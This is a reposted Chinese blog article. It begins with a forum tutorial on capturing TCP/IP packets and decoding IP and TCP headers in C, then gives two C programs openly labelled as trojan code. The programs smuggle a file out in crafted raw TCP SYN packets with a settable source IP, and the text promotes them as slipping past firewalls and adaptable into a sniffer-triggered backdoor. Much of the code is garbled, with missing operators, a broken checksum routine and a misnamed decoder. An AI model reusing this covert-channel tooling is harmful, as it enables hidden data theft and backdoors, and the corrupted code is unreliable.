关于TCP/IP数据包的截取和分析(摘自安全焦点论坛,原作:ilsy)

最新推荐文章于 2023-05-22 16:04:58 发布
最新推荐文章于 2023-05-22 16:04:58 发布
阅读量1.8k 收藏
点赞数
文章标签: struct tcp signal header windows socket
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hzb1983/article/details/4288414
版权

关于TCP/IP数据包的截取和分析(摘自安全焦点论坛,原作:ilsy)


TCP/IP数据包的截取是一个简单的工作,在Windows 2000/xp下,下面方法可以完成TCP/IP数据包的截获:
1、通过建立rawsocket来完成对TCP/IP数据包的截获。从Windows 2000开始,Winsock 2开始支持原始socket,可以 截获所有经过本机的TCP/IP数据包,支持拨号网络,但对本机向外发送的TCP/IP数据包截获有缺陷。可以从http://www.codeguru.com/Cpp/I-N/network/tcpip/article.php/c5413得到更加详细的信息及演示代码,现在很多基于rawsocket的代码都是参照这篇文章完成的。
2、通过WinPcap Developer's pack来完成对TCP/IP数据包的截获。这个开发包可以很好的在windows 9x/nt/2000/xp下工作,不支持拨号网络。可以从http://winpcap.polito.it/获得更详细的信息和用户手册,在本版的精华版也包括一个介绍这个开发包的文章可以参照。
Windows下对TCP/IP数据包的截获大多通过这两个方法来完成。如果你需要编写一个轻量级的TCP/IP数据包的截取和分析工具,而且只在Windows 2000/xp下工作,你可以选择第一种方法,比较简单,而且不需要另外的驱动;否则,你需要选择第二种方法或其他方法。
在类UNIX系统(比如linux)下,通常使用libpcap(http://www.tcpdump.org/)完成TCP/IP数据包的截取工作,它可以工作在多种操作系统下。

可以从互联网上面搜索到很多Windows下的TCP/IP数据包截取的演示代码,还可以搜索到很多linux下的开源项目,甚至功能完备复杂的大型TCP/IP数据包截取项目。

TCP/IP数据包的分析就比较困难和麻烦了。首先这种分析是基于对TCP/IP协议族的理解之上的,如果你还不了解,《TCP-IP详解卷1:协议》是首先需要翻阅的书籍,如果懒的看,那也不要提什么分析了,呵呵。
截取了一个TCP/IP数据包后,首先分离出IP协议(IP“Internet Protocol”协议是TCP/IP协议族中最为核心的协议,所有的TCP、UDP、ICMP和IGMP数据等都是以IP数据报格式传输的)的头部分,从IP协议头中可以得到很多关键的数据,如IP头的长度、源IP、目的IP、TCP/IP协议类型等,下面演示代码实现这个功能:

typedef struct _IP_HEADER             //定义IP首部
{
       unsigned char     h_lenver;        //4位首部长度+4位IP版本号
     unsigned char     tos;             //8位服务类型TOS
       unsigned short    total_len;       //16位总长度(字节)
     unsigned short    ident;           //16位标识
     unsigned short    frag_and_flags; //3位标志位+13位片偏移
     unsigned char     ttl;             //8位生存时间 TTL
       unsigned char     proto;           //8位协议 (TCP, UDP 或其他)
       unsigned short    checksum;        //16位IP首部校验和
     unsigned int      sourceIP;        //32位源IP地址
     unsigned int      destIP;          //32位目的IP地址
} IP_HEADER;

typedef struct _TCP_HEADER             //定义TCP首部
{
       USHORT th_sport;                   //16位源端口
     USHORT th_dport;                   //16位目的端口
     UINT    th_seq;                     //32位序列号
     UINT    th_ack;                     //32位确认号
     UCHAR   th_lenres;                  //4位首部长度/6位保留字
     UCHAR   th_flag;                    //6位标志位
     USHORT th_win;                     //16位窗口大小
     USHORT th_sum;                     //16位校验和
     USHORT th_urp;                     //16位紧急数据偏移量
} TCP_HEADER;

unsigned short DecodeIPHeader(char *buf)   //IP头解码函数 (得到IP头的长度,其他内容得到方法类似)
{
     IP_HEADER * ipheader;
     unsigned short ipheaderlen;

     ipheader = (IP_HEADER *)buf;
     ipheaderlen = sizeof(unsigned long) * (ipheader->h_lenver & 0xf);
    
     return ipheaderlen;
}

好,现在我们获得了IP头的长度,用类似的方法也可以获得了协议类型等其他数据。假设协议类型是TCP,那么接着就可以从数据包中分离出TCP协议(TCP协议是可靠的端到端协议)头的数据,从TCP协议头中得到很多关键的数据,如源端口、目的端口、数据偏移、控制位等。从目的端口中我们可以简单的(但不一定准确)判断一下跟着的数据是什么协议,如端口是80那么是HTTP协议、端口是21是FTP等(HTTP、FTP等协议都是基于TCP协议实现的)。

unsigned short DecodeIPHeader(char *buf)   //TCP头解码函数 (得到目的端口,其他内容得到方法类似)
{
     TCP_HEADER * tcpheader;
     unsigned short ipheaderlen;

     ipheaderlen = DecodeIPHeader(buf);
     tcpheader = (TCP_HEADER *)(buf + ipheaderlen);
    
     return tcpheader->th_dport;
}

通过类似的方法,得到所有需要的数据。一个正常的TCP连接总是由三次握手开始的,也就是说开始的三个数据包它的数据偏移是0,通过控制位可以知道三次握手的完成状态。接着就是分析接下来的数据了,接下来的数据就有很多变化了,一般情况下针对每一种协议都要写解码函数,可以通过端口和数据的一些标志判断数据包是什么协议的数据包,比如SMB协议开始会有0xff加SMB的标志,当然,这首先一个条件是协议是已知并且公开的,如果一个协议是不公开的,那就需要对使用这个协议的网络应用程序进行分析以确定协议的结构并写出相应的解码函数,这就是更复杂和麻烦的工作了,需要的知识也就更多,就不是本文要解决的问题了。

关于各种协议的解码函数在Windows下我是没有找到公开的源码,但如果有时间和耐心,可以参考下面linux下的开源项目,对编写自己的协议解码还是可能有所帮助。如:

http://www.cpan.org/authors/id/T/TI/TIMPOTTER/NetPacket-0.03.tar.gz
用于基本的IP/TCP/UDP等包解码的模块,剥除各种协议头,抽取各个字段。


http://www.ethereal.com/download.html
Ethereal是一个开源项目,功能强大的数据截取分析工具。



Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=398259

 

通过发送tcp数据包来实现文件传送,可以穿透大部分防火墙,具体原理不在多说,请参看xfocus.chm
以下的程序只是一个DEMO,如果是大型服务器的话,你就自己优化吧,否则cpu占有率是很大的.你可以修改
成自己的后门协议,完成嗅探启动的功能,虽然网上也流传着嗅探启动的代码,但都是server端的,我把client端代码也公布,比较简单.

SERVER:

/*
Send File with Raw Sockets V 0.0.5
by wzt
*/
#include stdio.h>
#include unistd.h>
#include fcntl.h>
#include string.h>
#include sys/socket.h>
#include sys/types.h>
#include netinet/in.h>
#define MAXSIZE 65535
#define DATASIZE 1024
#define SEQ 12345
#define TROJAN_ID 6789
#define IPLEN sizeof(struct iphdr)
#define TCPLEN sizeof(struct tcphdr)
#define PACKLEN sizeof(struct iphdr) sizeof(struct tcphdr) sizeof(unsigned int) sizeof(unsigned int) strlen(trojan.data)
#define PSELEN sizeof(struct psehdr)
#define TROJANLEN sizeof(unsigned int) sizeof(unsigned int) strlen(trojan.data)
struct iphdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
};
struct tcphdr{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
struct psehdr{
unsigned long saddr;
unsigned long daddr;
unsigned char reserved;
unsigned char proto;
unsigned short len;
};
struct trojan_packet{
unsigned int trojan_id;
unsigned int datalen;
char data[DATASIZE];
};
void usage(char *pro);
unsigned short in_cksum(unsigned short *addr,int len);
int tcpsend(char *src_ip,char *src_port,char *dst_ip,char *dst_port,char *data);
void usage(char *pro)
{
fprintf(stdout,"%s /n",pro);
exit(0);
}
unsigned short in_cksum(unsigned short *addr,int len)
{
register int sum = 0;
register u_short *w = addr;
register int nleft = len;
u_short value =0;
while( nleft > 1 ){
sum = *w ;
nleft -= 2;
}
if( nleft == 1 ){
*(u_char *)(&value) = *(u_char *)w;
sum = value;
}
sum = ( sum >> 16 ) ( sum & 0xffff );
sum = ( sum >> 16 );
return value;
}
int tcpsend(char *src_ip,char *src_port,char *dst_ip,char *dst_port,char *data)
{
struct iphdr ip;
struct tcphdr tcp;
struct psehdr pseuhdr;
struct trojan_packet trojan;
struct sockaddr_in remote;
char data_buf[MAXSIZE];
int sock_id;
int data_len;
int flag=1;
int s_len;
if( ( sock_id = socket(AF_INET,SOCK_RAW,IPPROTO_TCP) ) -1 ){
perror("[-] socket");
exit(1);
}
if( setsockopt(sock_id,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) 0 ){
perror("[-] setsockopt");
exit(1);
}
trojan.trojan_id = htons(TROJAN_ID);
data_len = strlen(data);
strcpy(trojan.data,data);
trojan.datalen = data_len;

ip.h_verlen = ( 4 4 | sizeof(struct iphdr) / sizeof(unsigned long) );
ip.tos = 0;
ip.total_len = htons(PACKLEN);
ip.frag_and_flags = 0x40;
ip.ident = 13;
ip.ttl = 255;
ip.proto = IPPROTO_TCP;
ip.sourceIP = inet_addr(src_ip);
ip.destIP = inet_addr(dst_ip);
ip.checksum = 0;
tcp.th_sport = htons(atoi(src_port));
tcp.th_dport = htons(atoi(dst_port));
tcp.th_seq = htonl(SEQ);
tcp.th_ack = htonl(0);
tcp.th_lenres= (sizeof(struct tcphdr) / 4 4 | 0 );
tcp.th_flag = 2;
tcp.th_win = htons(512);
tcp.th_sum = 0;
tcp.th_urp = 0;
pseuhdr.saddr = ip.sourceIP;
pseuhdr.daddr = ip.destIP;
pseuhdr.reserved = 0 ;
pseuhdr.proto = ip.proto;
pseuhdr.len = htons( TCPLEN TROJANLEN );
memcpy(data_buf,&pseuhdr,PSELEN);
memcpy(data_buf PSELEN,&tcp,TCPLEN);
memcpy(data_buf PSELEN TCPLEN,&trojan,TROJANLEN);

tcp.th_sum = in_cksum( (unsigned short *)data_buf,( PSELEN TCPLEN TROJANLEN data_len ) );

memcpy(data_buf,&ip,IPLEN);
memcpy(data_buf IPLEN,&tcp,TCPLEN);
memcpy(data_buf IPLEN TCPLEN,&trojan,TROJANLEN);
remote.sin_family = AF_INET;
remote.sin_port = tcp.th_dport;
remote.sin_addr.s_addr = ip.destIP;
if( (s_len = sendto( sock_id,data_buf,PACKLEN,0,(struct sockaddr *)&remote,sizeof(struct sockaddr)) ) 0 ){
perror("[-] sendto");
exit(1);
}
printf("[ ] Packet Successfuly Sending %d size./n",s_len);
// printf("%s",trojan.data);
close(sock_id);
}
int main(int argc,char **argv)
{
char buffer[DATASIZE] = {0};
char temp[DATASIZE];
int fd;
int fd1;
int n_char;
if( argc 6 ) usage(argv[0]);
if( (fd = open(argv[5],O_RDONLY)) 0 ){
perror("[-] open");
exit(1);
}
while( (n_char = read(fd,buffer,DATASIZE)) > 0 ){
buffer[n_char] = 0;
tcpsend(argv[1],argv[2],argv[3],argv[4],buffer);
}
close(fd);
printf("[ ] Done./n");
return 0;
}
CLIENT:

/*
Recv File From Raw Sockets V 0.0.5
by wzt
*/
#include stdio.h>
#include sys/socket.h>
#include sys/types.h>
#include netinet/in.h>
#include signal.h>
#define DEBUG
#define DATASIZE 1024
#define SEQ 12345
#define TROJAN_ID 6789
#define PACKETLEN sizeof(struct iphdr) sizeof(struct tcphdr) sizeof(struct trojan_packet)
#define PORT 61
#define PID 14844
struct iphdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
};
struct tcphdr{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
struct trojan_packet{
unsigned int trojan_id;
unsigned int datalen;
char data[DATASIZE];
};
struct tpacket{
struct iphdr ip;
struct tcphdr tcp;
struct trojan_packet trojan;
};
void usage(char *help);
void wait_tcp_signal(int fd);
void usage(char *pro)
{
fprintf(stdout," usage : %s /n",pro);
exit(0);
}
void wait_tcp_signal(int fd)
{
struct tpacket *packet;
int sock_id;
int r_len;
packet = (struct tpacket *)malloc(PACKETLEN);
if( packet == NULL ){
printf("[-] malloc packet");
exit(1);
}
signal(SIGCHLD,SIG_IGN);
while(1){
if( (sock_id = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) 1 ){
perror("[-] socket");
exit(0);
}
printf("[ ] !!Waiting Signal!!./n");


while(1){
memset(packet,0,sizeof(struct tpacket));
r_len = read(sock_id,packet,sizeof(struct tpacket) DATASIZE );
#ifdef DEBUG
printf("[ ] Recv a signal %d size/n",r_len);
#endif
if( packet->ip.proto == IPPROTO_TCP ){
if( ntohs(packet->tcp.th_dport) == PORT ){
printf("[ ] !!!Found PORT./n");
kill(PID,SIGKILL);
printf("[ } KILL Pid OK./n");
break;
}
if( ntohl(packet->tcp.th_seq) == SEQ && packet->tcp.th_flag == 2 && ntohs(packet->trojan.trojan_id) == TROJAN_ID ){
#ifdef DEBUG
printf("[ ] Start ================================================= [ ]/n");
printf("[ ] Trojan.Id : %d/n",ntohs(packet->trojan.trojan_id));
printf("[ ] Source IP addr : %s/n",inet_ntoa(packet->ip.sourceIP));
printf("[ ] Source Port : %d/n",ntohs(packet->tcp.th_sport));
printf("[ ] Dest Port : %d/n",ntohs(packet->tcp.th_dport));
printf("[ ] Dest IP : %s/n",inet_ntoa(packet->ip.destIP));
printf("[ ] Data : %d/n",packet->trojan.datalen);
printf("[ ] End ================================================= [ ]/n");
#endif
write(fd,packet->trojan.data,packet->trojan.datalen );
}
}
}
close(sock_id);
}
}
int main(int __argc,char **__argv)
{
int fd;
if( __argc == 1 ) usage(__argv[0]);
if( (fd = creat(__argv[1],0777)) -1 ){
perror("[-] creat");
exit(1);
}
wait_tcp_signal(fd);
close(fd);
return 0;
}

hzb1983
关注
TCP/IP协议详解
王佳斌
05-11 38万+
认识HTTP协议 它是互联网协议(Internet Protocol Suite),一个网络通信模型,是互联网的一个基本的构架。 HTTP协议是Hyper Text Transfer Protocol(超文本传输协议)的缩写,是用于从万维网(WWW:World Wide Web )服务器传输超文本到本地浏览器的传送协议。 HTTP是一个基于TCP/IP通信协议来传递数据(HTML 文件, 图片文件...
《网络安全自学教程》- TCP/IP协议栈的安全问题和解决方案
最新发布
wangyuxiang946的博客
06-18 9427
TCP/IP协议栈的安全问题和解决方案
tcpdump - 数据包进行截获的包分析工具
墨鱼菜鸡
07-11 1324
From:http://www.cnblogs.com/ggjucheng/archive/2012/01/14/2322659.html 30 分钟掌握 tcpdump:http://zhuanlan.51cto.com/art/201701/527498.htm Androidtcpdump下载:https://www.androidt...
关于TCP/IP数据包截取分析
黑子工作室
06-20 1万+
关于TCP/IP数据包截取分析摘自安全焦点论坛原作ilsyTCP/IP数据包截取是一个简单的工作,在Windows 2000/xp下,下面方法可以完成TCP/IP数据包的截获:1、通过建立rawsocket来完成对TCP/IP数据包的截获。从Windows 2000开始,Winsock 2开始支持原始socket,可以 截获所有经过本机的TCP/IP数据包,支持拨号网络,但对本机向外
使用tcpdump对网络上的数据包进行截获并分析
紫梦小缘
10-31 1061
一. 安装说明 使用 yum install tcpdump 命令安装tcpdump(同时可以根据个人需求,创建一个文件夹,专门用于存放抓取的数据包文件,后续在该文件夹下执行tcpdump相关命令即可) 二. 抓取文件 打开需要抓包的服务器,根据是否存在中间代理服务来判断需要抓包的ip及端口(有中间代理服务,则ip为中间代理服务的ip) 举个栗子:抓取网卡eht0 及192.168.168.18ip和8081端口(每个服务器的网卡不一定是eht0,先使用ipconfig查看清楚自己又几个网卡,
TCP抓包和数据包分析
以后会多把工作中总结的知识、问题处理思路和方法通过博客分享出来,欢迎大家关注和共同探讨!
05-22 3768
Tcp抓包和数据分析
利用netfilter截获、修改数据包基础与实现
AFCC_的博客(Web_Dog)
08-21 3413
本着记录自己疯狂过的青春,对netfilter的应用学习做点记录。 0x00前提 双网卡硬件设备作中间件,一个网卡接收向另一网卡转发时进行操作数据包。下文中举例eth0为进入,eth1为发出,相对而言。本次开发利用netfilter框架进行完整开发,基本实现对数据包的任意操作。 0x01 什么是netfilter Netfilter是linux2.4.x引入的一个子系统,作为一个通用的、抽象的框...
ip数据包分析_关于TCP_IP数据包截取分析
06-03
### IP数据包分析_关于TCP/IP数据包截取分析 #### TCP/IP数据包截取技术 在深入探讨TCP/IP数据包分析之前,我们首先需要了解如何有效地截取这些数据包。根据给定的文件信息,有两种主要的方法可以在Windows...
【测试】echo发送和接收TCP/UDP数据包|shell 发送TCP/UDP数据包
小鱼菜鸟的博客
07-22 2658
目录 通过/dev/tcp、/dev/udp shell给tcp或udp服务发送16进制报文指令 shell处理进制数和字节 shell 10进制转16进制数 十六进制字符串到字节 shell字符串倒叙 shell判断大小端序 通过/dev/tcp、/dev/udp (Linux shell脚本中发起tcp、udp连接_Blue su...
TCP/IP数据包封装与拆解概述
热门推荐
echo_bright_的博客
10-30 2万+
《Linux高性能服务器编程》阅读笔记:1. TCP/IP封包流程  (1) 经过TCP/UDP封装后的数据称为TCP报文段/UDP数据报。因为TCP协议除了会为通信双方维持一个连接,还具有超时重发的功能,所以操作系统会将APP的要发送数据存储在内核的相关数据结构中:  上图描述的是TCP发送数据时示意图,接收缓冲区也是如此。发送端APP调用系统调用send()/write()函数向TCP连接写数据
基于winsock原始套接字的IP数据包的捕获与解析
01-22
本文使用windows sockets 的原始套接字实现IP数据包的捕获与解析,有详细的设计过程,并附有源代码,源代码中有注释。
深入Socket-TCP
追梦的小狼狗
03-17 455
本文部分内容借鉴此博客 什么是TCP TCP-Transmission Control Protocal-即传输控制协议,是一种面向连接的,可靠的,基于字节流的传输层通信协议。(UDP是无连接,不可靠,基于数据报文的传输层通信协议) TCP的机制 连接可靠性-三次握手 所谓三次握手,是指建立一个TCP连接时,需要客户端和服务器总共发送三个包 第一次握手(SYN=1,seq=x) 客户端发送一个...
linux tcp 截获 rawsocket,linux内核构造skb发包-----raw、tcp网络编程
weixin_42378094的博客
05-15 407
1. 内核raw发包#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #...
winpcap小窥-tcp截取与转发
yz_kintang的专栏
12-09 4738
多年不做程序员,近日来由于工作偶有需要,在32位系统上做了利用winpcap做了一个包转发器。主要完成的功能是:需要从某一台电脑截取其发向某服务器,某端口的包,然后转发到目的服务器对应端口。在参考了winpcap的样例代码后,发现其只有分析UDP包的样例程序,于是乎自己做了一个TCP包的截获解析并转发。下面上干货。 这一段,都是winpcap的相关代码: int main(int argc ,
Windows下C语言实现原始socket抓包
Spwpun的博客
11-10 6820
原始Socket抓包 0x01. 源码: #include <stdio.h> #include <winsock2.h> #include <iphlpapi.h> #include <mstcpip.h> #include <windows.h> #pragma comment(lib
nginx+tcp
tlin2011的专栏
06-09 644
1: 使用 nginx_tcp_proxy_module  ,这是第三方的一个插件, 用于支持nginx 的tcp连接, 目前最新版的ngxin1.9也可以支持TCP负载均衡 2:nginx_tcp_proxy_model 配置 events {     use  epoll;     worker_connections  102400; } tcp {         t
基于VC6.0的抓取TCP/IP数据包的C++实现
max18的专栏
09-05 2870
#include #include #include #pragma comment(lib,"Ws2_32.lib") #include using namespace std; //IP首部 typedef struct tIPPackHead { enum PROTOCOL_TYPE{ PROTOCOL_TCP = 6, PR
网络中的数据分割问题
weixin_40493805的博客
05-24 1209
1、tcp、udp和ip的数据传输分割问题。 2、udp理论上是不分割,直接将数据报文传给ip层,然后传输,如果数据报文太大(超过以太网的mtu1500),ip可能就要进行切割. 3、tcp是要进行切割的,自己切割,然后编写序号,是按照字节编写序号的,因为是连接的,因此有sequence这个东西,尽量避免ip切割,所以自己切割。其实,主要是mss(最大报文段长度)的原因,因此tcp给了ip以后,可以发现一般数据都是小于mtu的,因此ip不会分割了。 4、参考 https://blog.csdn.net/w
TCP/IP数据包解析:格式详解与编程参考
"TCP/IP包格式" TCP/IP协议是互联网的核心,它定义了数据在网络中传输的规则和格式。...通过理解TCP/IP包的结构,开发者可以更好地解析网络数据包,进行网络编程,例如实现网络嗅探、协议分析或者网络安全相关的应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值